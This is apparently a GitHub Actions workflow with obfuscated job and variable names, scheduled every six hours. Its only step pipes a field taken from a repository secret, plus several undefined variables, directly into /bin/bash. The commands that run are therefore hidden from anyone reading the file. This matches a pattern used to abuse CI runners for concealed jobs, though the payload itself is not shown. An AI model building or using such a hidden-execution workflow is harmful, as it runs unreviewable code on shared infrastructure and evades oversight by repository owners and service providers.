name: xupingzhi4321
on:
  workflow_dispatch:
  schedule:
    - cron: '41 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xupingzhi4321
        env:
          wc63: ${{ secrets.wc63 }}
        run: |
          echo $wc63 | jq -r .w6 | /bin/bash
          echo $oinmx36494 | jq -r .ffk515 | /bin/bash
          echo $aon0166 | jq -r .ymvw7 | /bin/bash
          echo $nyw45437 | jq -r .fmnj61969 | /bin/bash
          echo $r65616 | jq -r .jtcl49227 | /bin/bash
          echo $hajt1 | jq -r .wojen74 | /bin/bash
          echo $mkhnv9777 | jq -r .kko2353 | /bin/bash

